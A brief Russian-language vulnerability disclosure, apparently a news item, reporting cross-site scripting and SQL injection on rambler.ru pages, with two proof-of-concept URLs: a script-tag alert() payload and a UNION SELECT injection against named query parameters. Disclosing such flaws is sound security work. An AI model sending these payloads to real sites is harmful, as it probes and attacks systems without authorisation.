Обнаружена возможность выполнения
произвольного кода и SQL Injection:

http://www.rambler.ru/db/news/news.html?dd= 6&dm=9&dy=<script>javascript:alert('hello')</script> 
http://tv.rambler.ru/index.html?d=2004-09-05 &channel_id=0%20UNION%20SELECT%20null/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии